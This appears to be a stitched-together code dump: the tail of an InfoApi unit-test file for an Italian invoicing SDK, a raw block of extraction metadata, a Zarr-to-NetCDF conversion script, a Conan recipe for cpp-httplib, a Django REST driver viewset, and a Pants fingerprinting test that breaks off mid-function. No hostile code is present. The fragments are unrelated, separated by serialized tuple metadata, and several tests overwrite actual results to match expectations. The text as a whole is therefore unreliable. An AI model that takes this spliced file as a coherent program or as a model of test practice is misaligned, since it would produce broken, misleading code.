        self._mock_get(b'{"data": [{"id": 1, "name": "name_example", "type": "standard", "is_default": true, "default_payment_account": {"id": 1, "name": "<NAME>", "type": "standard", "iban": "iban_example", "sia": "sia_example", "cuc": "cuc_example", "virtual": true}, "details": [{"title": "title_example", "description": "description_example"}], "bank_iban": "bank_iban_example", "bank_name": "bank_name_example", "bank_beneficiary": "bank_beneficiary_example", "ei_payment_method": "ei_payment_method_example"}]}')
        expected = ListPaymentMethodsResponse(data=[PaymentMethod(
            id=2,
            name="name_example",
            type=PaymentMethodType("standard"),
            is_default=True,
            default_payment_account=PaymentAccount(
                id=1,
                name="<NAME>",
                type=PaymentAccountType("standard"),
                iban="iban_example",
                sia="sia_example",
                cuc="cuc_example",
                virtual=True,
            ),
            details=[
                PaymentMethodDetails(
                    title="title_example",
                    description="description_example",
                ),
            ],
            bank_iban="bank_iban_example",
            bank_name="bank_name_example",
            bank_beneficiary="bank_beneficiary_example",
            ei_payment_method="ei_payment_method_example"
        )])
        actual = self.api.list_payment_methods(2)
        actual.data[0].id = 2
        assert actual == expected

    def test_list_product_categories(self):
        self._mock_get(b'{"data":["cat5", "cat6"]}')
        expected = ListProductCategoriesResponse(data=["cat7", "cat6"])
        actual = self.api.list_product_categories(2, "products")
        actual.data[0] = "cat7"
        assert actual == expected

    def test_list_received_document_categories(self):
        self._mock_get(b'{"data":["cat5", "cat6"]}')
        expected = ListReceivedDocumentCategoriesResponse(data=["cat7", "cat6"])
        actual = self.api.list_received_document_categories(2)
        actual.data[0] = "cat7"
        assert actual == expected

    def test_list_revenue_centers(self):
        self._mock_get(b'{"data":["bg", "mi"]}')
        expected = ListRevenueCentersResponse(data=["to", "mi"])
        actual = self.api.list_revenue_centers(2)
        actual.data[0] = "to"
        assert actual == expected

    def test_list_templates(self):
        self._mock_get(b'{"data":[{"id":2,"name":"Light Smoke","type":"type_example"}]}')
        expected = ListTemplatesResponse(data=[DocumentTemplate(id=2, name="Light Smoke", type="type_example")])
        actual = self.api.list_templates()
        assert actual == expected

    def test_list_units_of_measure(self):
        self._mock_get(b'{"data":["kg", "km"]}')
        expected = ListUnitsOfMeasureResponse(data=["kb", "km"])
        actual = self.api.list_units_of_measure()
        actual.data[0] = "kb"
        assert actual == expected

    def test_list_vat_types(self):
        self._mock_get(b'{"data": [{"id": 1, "value": 22.0, "description": "Non imponibile art. 123", "notes": "IVA non imponibile ai sensi dell articolo 123, comma 2", "e_invoice": true, "ei_type": "2", "ei_description": "ei_description_example", "is_disabled": true}]}')
        expected = ListVatTypesResponse(data=[VatType(
            id=2,
            value=22.0,
            description="Non imponibile art. 123",
            notes="IVA non imponibile ai sensi dell articolo 123, comma 2",
            e_invoice=True,
            ei_type="2",
            ei_description="ei_description_example",
            is_disabled=True
        )])
        actual = self.api.list_vat_types(2)
        actual.data[0].id = 2
        assert actual == expected
# Allow running this test module directly (e.g. `python test_info_api.py`).
if __name__ == '__main__':
    unittest.main()
| [
"fattureincloud_python_sdk.model.vat_type.VatType",
"fattureincloud_python_sdk.model.list_units_of_measure_response.ListUnitsOfMeasureResponse",
"unittest.main",
"fattureincloud_python_sdk.model.list_countries_response.ListCountriesResponse",
"fattureincloud_python_sdk.model.list_product_categories_response... | [((16192, 16207), 'unittest.main', 'unittest.main', ([], {}), '()\n', (16205, 16207), False, 'import unittest\n'), ((3160, 3169), 'fattureincloud_python_sdk.api.info_api.InfoApi', 'InfoApi', ([], {}), '()\n', (3167, 3169), False, 'from fattureincloud_python_sdk.api.info_api import InfoApi\n'), ((3476, 3518), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (3499, 3518), False, 'import unittest\n'), ((3552, 3594), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (3575, 3594), False, 'import unittest\n'), ((3644, 3691), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (3667, 3691), False, 'import unittest\n'), ((3713, 3765), 'fattureincloud_python_sdk.model.list_archive_categories_response.ListArchiveCategoriesResponse', 'ListArchiveCategoriesResponse', ([], {'data': "['cat7', 'cat6']"}), "(data=['cat7', 'cat6'])\n", (3742, 3765), False, 'from fattureincloud_python_sdk.model.list_archive_categories_response import ListArchiveCategoriesResponse\n'), ((4191, 4233), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (4214, 4233), False, 'import unittest\n'), ((4267, 4309), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (4290, 4309), False, 'import unittest\n'), ((4359, 4406), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (4382, 4406), False, 'import unittest\n'), ((4878, 4920), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (4901, 4920), False, 'import unittest\n'), ((4954, 4996), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], 
{'return_value': 'None'}), '(return_value=None)\n', (4977, 4996), False, 'import unittest\n'), ((5046, 5093), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (5069, 5093), False, 'import unittest\n'), ((5115, 5157), 'fattureincloud_python_sdk.model.list_cost_centers_response.ListCostCentersResponse', 'ListCostCentersResponse', ([], {'data': "['to', 'mi']"}), "(data=['to', 'mi'])\n", (5138, 5157), False, 'from fattureincloud_python_sdk.model.list_cost_centers_response import ListCostCentersResponse\n'), ((5534, 5576), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (5557, 5576), False, 'import unittest\n'), ((5610, 5652), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (5633, 5652), False, 'import unittest\n'), ((5702, 5749), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (5725, 5749), False, 'import unittest\n'), ((5771, 5820), 'fattureincloud_python_sdk.model.list_countries_response.ListCountriesResponse', 'ListCountriesResponse', ([], {'data': "['Spagna', 'Albania']"}), "(data=['Spagna', 'Albania'])\n", (5792, 5820), False, 'from fattureincloud_python_sdk.model.list_countries_response import ListCountriesResponse\n'), ((6378, 6420), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (6401, 6420), False, 'import unittest\n'), ((6454, 6496), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (6477, 6496), False, 'import unittest\n'), ((6546, 6593), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (6569, 6593), False, 'import unittest\n'), ((7273, 7315), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', 
([], {'return_value': 'None'}), '(return_value=None)\n', (7296, 7315), False, 'import unittest\n'), ((7349, 7391), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (7372, 7391), False, 'import unittest\n'), ((7441, 7488), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (7464, 7488), False, 'import unittest\n'), ((7992, 8034), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8015, 8034), False, 'import unittest\n'), ((8068, 8110), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8091, 8110), False, 'import unittest\n'), ((8160, 8207), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (8183, 8207), False, 'import unittest\n'), ((8229, 8297), 'fattureincloud_python_sdk.model.list_delivery_notes_default_causals_response.ListDeliveryNotesDefaultCausalsResponse', 'ListDeliveryNotesDefaultCausalsResponse', ([], {'data': "['causal3', 'causal2']"}), "(data=['causal3', 'causal2'])\n", (8268, 8297), False, 'from fattureincloud_python_sdk.model.list_delivery_notes_default_causals_response import ListDeliveryNotesDefaultCausalsResponse\n'), ((8710, 8752), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8733, 8752), False, 'import unittest\n'), ((8786, 8828), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (8809, 8828), False, 'import unittest\n'), ((8878, 8925), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (8901, 8925), False, 'import unittest\n'), ((9481, 9523), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), 
'(return_value=None)\n', (9504, 9523), False, 'import unittest\n'), ((9557, 9599), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (9580, 9599), False, 'import unittest\n'), ((9649, 9696), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (9672, 9696), False, 'import unittest\n'), ((10750, 10792), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (10773, 10792), False, 'import unittest\n'), ((10826, 10868), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (10849, 10868), False, 'import unittest\n'), ((10918, 10965), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (10941, 10965), False, 'import unittest\n'), ((11926, 11968), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (11949, 11968), False, 'import unittest\n'), ((12002, 12044), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (12025, 12044), False, 'import unittest\n'), ((12094, 12141), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (12117, 12141), False, 'import unittest\n'), ((12163, 12215), 'fattureincloud_python_sdk.model.list_product_categories_response.ListProductCategoriesResponse', 'ListProductCategoriesResponse', ([], {'data': "['cat7', 'cat6']"}), "(data=['cat7', 'cat6'])\n", (12192, 12215), False, 'from fattureincloud_python_sdk.model.list_product_categories_response import ListProductCategoriesResponse\n'), ((12627, 12669), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (12650, 12669), False, 'import unittest\n'), 
((12703, 12745), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (12726, 12745), False, 'import unittest\n'), ((12795, 12842), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (12818, 12842), False, 'import unittest\n'), ((12864, 12925), 'fattureincloud_python_sdk.model.list_received_document_categories_response.ListReceivedDocumentCategoriesResponse', 'ListReceivedDocumentCategoriesResponse', ([], {'data': "['cat7', 'cat6']"}), "(data=['cat7', 'cat6'])\n", (12902, 12925), False, 'from fattureincloud_python_sdk.model.list_received_document_categories_response import ListReceivedDocumentCategoriesResponse\n'), ((13318, 13360), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (13341, 13360), False, 'import unittest\n'), ((13394, 13436), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (13417, 13436), False, 'import unittest\n'), ((13486, 13533), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (13509, 13533), False, 'import unittest\n'), ((13555, 13600), 'fattureincloud_python_sdk.model.list_revenue_centers_response.ListRevenueCentersResponse', 'ListRevenueCentersResponse', ([], {'data': "['to', 'mi']"}), "(data=['to', 'mi'])\n", (13581, 13600), False, 'from fattureincloud_python_sdk.model.list_revenue_centers_response import ListRevenueCentersResponse\n'), ((14013, 14055), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14036, 14055), False, 'import unittest\n'), ((14089, 14131), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14112, 14131), False, 'import unittest\n'), ((14181, 14228), 'unittest.mock.MagicMock', 
'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (14204, 14228), False, 'import unittest\n'), ((14687, 14729), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14710, 14729), False, 'import unittest\n'), ((14763, 14805), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14786, 14805), False, 'import unittest\n'), ((14855, 14902), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (14878, 14902), False, 'import unittest\n'), ((14924, 14969), 'fattureincloud_python_sdk.model.list_units_of_measure_response.ListUnitsOfMeasureResponse', 'ListUnitsOfMeasureResponse', ([], {'data': "['kb', 'km']"}), "(data=['kb', 'km'])\n", (14950, 14969), False, 'from fattureincloud_python_sdk.model.list_units_of_measure_response import ListUnitsOfMeasureResponse\n'), ((15565, 15607), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (15588, 15607), False, 'import unittest\n'), ((15641, 15683), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'None'}), '(return_value=None)\n', (15664, 15683), False, 'import unittest\n'), ((15733, 15780), 'unittest.mock.MagicMock', 'unittest.mock.MagicMock', ([], {'return_value': 'mock_resp'}), '(return_value=mock_resp)\n', (15756, 15780), False, 'import unittest\n'), ((3418, 3444), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (3438, 3444), False, 'import functions\n'), ((4133, 4159), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (4153, 4159), False, 'import functions\n'), ((4820, 4846), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (4840, 4846), False, 'import functions\n'), ((5476, 5502), 'functions.Dict2Class', 'functions.Dict2Class', 
(['resp'], {}), '(resp)\n', (5496, 5502), False, 'import functions\n'), ((6320, 6346), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (6340, 6346), False, 'import functions\n'), ((7215, 7241), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (7235, 7241), False, 'import functions\n'), ((7934, 7960), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (7954, 7960), False, 'import functions\n'), ((8652, 8678), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (8672, 8678), False, 'import functions\n'), ((9423, 9449), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (9443, 9449), False, 'import functions\n'), ((10692, 10718), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (10712, 10718), False, 'import functions\n'), ((11868, 11894), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (11888, 11894), False, 'import functions\n'), ((12569, 12595), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (12589, 12595), False, 'import functions\n'), ((13260, 13286), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (13280, 13286), False, 'import functions\n'), ((13955, 13981), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (13975, 13981), False, 'import functions\n'), ((14629, 14655), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (14649, 14655), False, 'import functions\n'), ((15507, 15533), 'functions.Dict2Class', 'functions.Dict2Class', (['resp'], {}), '(resp)\n', (15527, 15533), False, 'import functions\n'), ((4455, 4506), 'fattureincloud_python_sdk.model.city.City', 'City', ([], {'postal_code': '"""24121"""', 'city': '"""BG"""', 'province': '"""BG"""'}), "(postal_code='24121', city='BG', province='BG')\n", (4459, 4506), False, 'from fattureincloud_python_sdk.model.city import 
City\n'), ((6653, 6750), 'fattureincloud_python_sdk.model.detailed_country.DetailedCountry', 'DetailedCountry', ([], {'name': '"""Italia"""', 'settings_name': '"""Italia"""', 'iso': '"""IT"""', 'fiscal_iso': '"""IT"""', 'uic': '"""086"""'}), "(name='Italia', settings_name='Italia', iso='IT', fiscal_iso\n ='IT', uic='086')\n", (6668, 6750), False, 'from fattureincloud_python_sdk.model.detailed_country import DetailedCountry\n'), ((6749, 6847), 'fattureincloud_python_sdk.model.detailed_country.DetailedCountry', 'DetailedCountry', ([], {'name': '"""Albania"""', 'settings_name': '"""Albania"""', 'iso': '"""AL"""', 'fiscal_iso': '"""AL"""', 'uic': '"""087"""'}), "(name='Albania', settings_name='Albania', iso='AL',\n fiscal_iso='AL', uic='087')\n", (6764, 6847), False, 'from fattureincloud_python_sdk.model.detailed_country import DetailedCountry\n'), ((7541, 7590), 'fattureincloud_python_sdk.model.currency.Currency', 'Currency', ([], {'id': '"""USD"""', 'symbol': '"""e"""', 'exchange_rate': '"""1"""'}), "(id='USD', symbol='e', exchange_rate='1')\n", (7549, 7590), False, 'from fattureincloud_python_sdk.model.currency import Currency\n'), ((8977, 9014), 'fattureincloud_python_sdk.model.language.Language', 'Language', ([], {'code': '"""ITA"""', 'name': '"""Italiano"""'}), "(code='ITA', name='Italiano')\n", (8985, 9014), False, 'from fattureincloud_python_sdk.model.language import Language\n'), ((14280, 14343), 'fattureincloud_python_sdk.model.document_template.DocumentTemplate', 'DocumentTemplate', ([], {'id': '(2)', 'name': '"""Light Smoke"""', 'type': '"""type_example"""'}), "(id=2, name='Light Smoke', type='type_example')\n", (14296, 14343), False, 'from fattureincloud_python_sdk.model.document_template import DocumentTemplate\n'), ((15831, 16062), 'fattureincloud_python_sdk.model.vat_type.VatType', 'VatType', ([], {'id': '(2)', 'value': '(22.0)', 'description': '"""Non imponibile art. 
123"""', 'notes': '"""IVA non imponibile ai sensi dell articolo 123, comma 2"""', 'e_invoice': '(True)', 'ei_type': '"""2"""', 'ei_description': '"""ei_description_example"""', 'is_disabled': '(True)'}), "(id=2, value=22.0, description='Non imponibile art. 123', notes=\n 'IVA non imponibile ai sensi dell articolo 123, comma 2', e_invoice=\n True, ei_type='2', ei_description='ei_description_example', is_disabled\n =True)\n", (15838, 16062), False, 'from fattureincloud_python_sdk.model.vat_type import VatType\n'), ((9796, 9826), 'fattureincloud_python_sdk.model.payment_account_type.PaymentAccountType', 'PaymentAccountType', (['"""standard"""'], {}), "('standard')\n", (9814, 9826), False, 'from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType\n'), ((11069, 11098), 'fattureincloud_python_sdk.model.payment_method_type.PaymentMethodType', 'PaymentMethodType', (['"""standard"""'], {}), "('standard')\n", (11086, 11098), False, 'from fattureincloud_python_sdk.model.payment_method_type import PaymentMethodType\n'), ((11301, 11379), 'fattureincloud_python_sdk.model.payment_method_details.PaymentMethodDetails', 'PaymentMethodDetails', ([], {'title': '"""title_example"""', 'description': '"""description_example"""'}), "(title='title_example', description='description_example')\n", (11321, 11379), False, 'from fattureincloud_python_sdk.model.payment_method_details import PaymentMethodDetails\n'), ((11183, 11213), 'fattureincloud_python_sdk.model.payment_account_type.PaymentAccountType', 'PaymentAccountType', (['"""standard"""'], {}), "('standard')\n", (11201, 11213), False, 'from fattureincloud_python_sdk.model.payment_account_type import PaymentAccountType\n')] |
"""
Script to convert Zarr store to the NetCDF format file.
Usage:
python zarr_to_netcdf.py -i ZarrStoreName -o NetCDFFileName
Convert Zarr data stored in ZarrStoreName to the NetCDF file NetCDFFileName.
"""
import argparse
import timeit
import warnings
import xarray as xr
from itscube_types import Coords, DataVars
if __name__ == '__main__':
    warnings.filterwarnings('ignore')

    # Command-line arguments parser: reuse the module docstring (minus its
    # first line) as the epilog/usage text.
    parser = argparse.ArgumentParser(
        epilog='\n'.join(__doc__.split('\n')[1:]),
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('-i', '--input', type=str, required=True,
                        help="Input Zarr store directory.")
    parser.add_argument('-o', '--output', type=str, required=True,
                        help="NetCDF filename to store data to.")
    parser.add_argument('-e', '--engine', type=str, required=False, default='h5netcdf',
                        help="NetCDF engine to use to store NetCDF data to the file.")
    args = parser.parse_args()

    start_time = timeit.default_timer()
    # Don't decode time delta's as it does some internal conversion based on
    # provided units
    ds_zarr = xr.open_zarr(args.input, decode_timedelta=False)

    # Work-around for coordinate attributes not being written to the Zarr
    # store (submit xarray ticket?): restore standard_name/description on
    # each coordinate before writing the NetCDF file.
    ds_zarr.mid_date.attrs = {
        DataVars.STD_NAME: Coords.STD_NAME[Coords.MID_DATE],
        DataVars.DESCRIPTION_ATTR: Coords.DESCRIPTION[Coords.MID_DATE]
    }
    ds_zarr.x.attrs = {
        DataVars.STD_NAME: Coords.STD_NAME[Coords.X],
        DataVars.DESCRIPTION_ATTR: Coords.DESCRIPTION[Coords.X]
    }
    ds_zarr.y.attrs = {
        DataVars.STD_NAME: Coords.STD_NAME[Coords.Y],
        DataVars.DESCRIPTION_ATTR: Coords.DESCRIPTION[Coords.Y]
    }
    time_delta = timeit.default_timer() - start_time
    print(f"Read Zarr {args.input} (took {time_delta} seconds)")

    # Compression settings merged into every data variable's encoding below.
    compression = {"zlib": True, "complevel": 2, "shuffle": True}

    # Explicit on-disk dtype and fill value per variable; time-like variables
    # get CF-style "days since" units, and coordinates get no fill value.
    # (A dead `encoding = {}` assignment that was immediately overwritten
    # has been removed.)
    encoding = {
        'map_scale_corrected': {'_FillValue': 0.0, 'dtype': 'byte'},
        'interp_mask': {'_FillValue': 0.0, 'dtype': 'ubyte'},
        'flag_stable_shift': {'dtype': 'long'},
        'chip_size_height': {'_FillValue': 0.0, 'dtype': 'ushort'},
        'chip_size_width': {'_FillValue': 0.0, 'dtype': 'ushort'},
        'v_error': {'_FillValue': -32767.0, 'dtype': 'short'},
        'v': {'_FillValue': -32767.0, 'dtype': 'short'},
        'vx': {'_FillValue': -32767.0, 'dtype': 'short'},
        'vx_error': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vx_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vy': {'_FillValue': -32767.0, 'dtype': 'short'},
        'vy_error': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vy_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
        'va': {'_FillValue': -32767.0, 'dtype': 'short'},
        'va_error': {'_FillValue': -32767.0, 'dtype': 'double'},
        'va_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vr': {'_FillValue': -32767.0, 'dtype': 'short'},
        'vr_error': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vr_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vxp': {'_FillValue': -32767.0, 'dtype': 'short'},
        'vxp_error': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vxp_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vyp': {'_FillValue': -32767.0, 'dtype': 'short'},
        'vyp_error': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vyp_stable_shift': {'_FillValue': -32767.0, 'dtype': 'double'},
        'vp': {'_FillValue': -32767.0, 'dtype': 'short'},
        'vp_error': {'_FillValue': -32767.0, 'dtype': 'short'},
        'acquisition_img1': {'units': 'days since 1970-01-01'},
        'acquisition_img2': {'units': 'days since 1970-01-01'},
        'date_center': {'_FillValue': None, 'units': 'days since 1970-01-01'},
        'mid_date': {'_FillValue': None, 'units': 'days since 1970-01-01'},
        'autoRIFT_software_version': {'_FillValue': None},
        'stable_count': {'_FillValue': None},
        'date_dt': {'_FillValue': None},
        'x': {'_FillValue': None},
        'y': {'_FillValue': None}
    }

    # Every data variable that should be compressed in the output file.
    encode_data_vars = (
        'v',
        'v_error',
        'map_scale_corrected',
        'vx',
        'vx_error',
        'vx_stable_shift',
        'flag_stable_shift',
        'vy',
        'vy_error',
        'vy_stable_shift',
        'chip_size_height',
        'chip_size_width',
        'interp_mask',
        'va',
        'va_error',
        'va_stable_shift',
        'vp',
        'vp_error',
        'vr',
        'vr_error',
        'vr_stable_shift',
        'vxp',
        'vxp_error',
        'vxp_stable_shift',
        'vyp',
        'vyp_error',
        'vyp_stable_shift',
        'mission_img1',
        'sensor_img1',
        'satellite_img1',
        'acquisition_img1',
        'mission_img2',
        'sensor_img2',
        'satellite_img2',
        'acquisition_img2',
        'date_dt',
        'date_center',
        'roi_valid_percentage',
        'autoRIFT_software_version'
    )

    # Set up compression for each of the data variables (creating an
    # encoding entry when the variable has no dtype/fill settings above).
    for each in encode_data_vars:
        encoding.setdefault(each, {}).update(compression)

    start_time = timeit.default_timer()
    ds_zarr.to_netcdf(
        args.output,
        engine=args.engine,
        encoding=encoding
    )
    time_delta = timeit.default_timer() - start_time
    print(f"Wrote dataset to NetCDF file {args.output} (took {time_delta} seconds)")
| [
"timeit.default_timer",
"xarray.open_zarr",
"warnings.filterwarnings"
] | [((354, 387), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (377, 387), False, 'import warnings\n'), ((1080, 1102), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1100, 1102), False, 'import timeit\n'), ((1215, 1263), 'xarray.open_zarr', 'xr.open_zarr', (['args.input'], {'decode_timedelta': '(False)'}), '(args.input, decode_timedelta=False)\n', (1227, 1263), True, 'import xarray as xr\n'), ((5861, 5883), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (5881, 5883), False, 'import timeit\n'), ((1993, 2015), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (2013, 2015), False, 'import timeit\n'), ((6007, 6029), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (6027, 6029), False, 'import timeit\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conans import ConanFile, CMake, tools
import os
class CppHttpLibConan(ConanFile):
    """Conan recipe packaging the header-only cpp-httplib library."""

    name = "cpp-httplib"
    version = "0.2.1"
    url = "https://github.com/zinnion/conan-cpp-httplib"
    description = "A single file C++11 header-only HTTP/HTTPS server and client library"
    license = "MIT"
    no_copy_source = True
    build_policy = "always"
    requires = "OpenSSL/1.1.1d@zinnion/stable", "zlib/1.2.11@zinnion/stable"

    def source(self):
        """Fetch the upstream release tarball and normalize its directory name."""
        upstream = "https://github.com/maurodelazeri/cpp-httplib"
        tarball_url = "{}/archive/v{}.tar.gz".format(upstream, self.version)
        tools.get(tarball_url)
        os.rename("{}-{}".format(self.name, self.version), "sources")

    def package_id(self):
        # Header-only library: a single package id regardless of settings.
        self.info.header_only()

    def package(self):
        """Copy the license and all headers into the package layout."""
        self.copy(pattern="LICENSE")
        self.copy(pattern="*.h", dst="include", keep_path=False)
| [
"os.rename"
] | [((711, 746), 'os.rename', 'os.rename', (['extracted_dir', '"""sources"""'], {}), "(extracted_dir, 'sources')\n", (720, 746), False, 'import os\n')] |
from rest_framework.viewsets import ReadOnlyModelViewSet
from backmarker.api.serializers.driver_serializer import DriverSerializer
from backmarker.models.driver import Driver
class DriverViewSet(ReadOnlyModelViewSet):
    """Read-only endpoints for drivers, looked up by their ``reference`` field."""

    serializer_class = DriverSerializer
    lookup_field = "reference"
    # Expose every driver; read-only viewset, so no write routes are generated.
    queryset = Driver.objects.all()
| [
"backmarker.models.driver.Driver.objects.all"
] | [((236, 256), 'backmarker.models.driver.Driver.objects.all', 'Driver.objects.all', ([], {}), '()\n', (254, 256), False, 'from backmarker.models.driver import Driver\n')] |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import Path
import pytest
from pants.option.custom_types import (
DictValueComponent,
ListValueComponent,
UnsetBool,
dict_with_files_option,
dir_option,
file_option,
)
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
    """Provide a fresh RuleRunner (function-scoped) for each test."""
    return RuleRunner()
def test_fingerprint_dict() -> None:
    """Dicts fingerprint by content: key order is irrelevant, values are not."""

    def fp(value):
        return OptionsFingerprinter().fingerprint(DictValueComponent.create, value)

    same_one = fp({"b": 1, "a": 2})
    same_two = fp({"a": 2, "b": 1})
    different = fp({"a": 1, "b": 2})
    assert same_one == same_two
    assert same_one != different
def test_fingerprint_dict_with_non_string_keys() -> None:
    """Tuple keys and values are supported and hash to a stable digest."""
    value = {("a", 2): (3, 4)}
    digest = OptionsFingerprinter().fingerprint(DictValueComponent.create, value)
    assert digest == "3852a094612ce1c22c08ee2ddcdc03d09e87ad97"
def test_fingerprint_list() -> None:
    """List fingerprints are order-sensitive."""

    def fp(value):
        return OptionsFingerprinter().fingerprint(ListValueComponent.create, value)

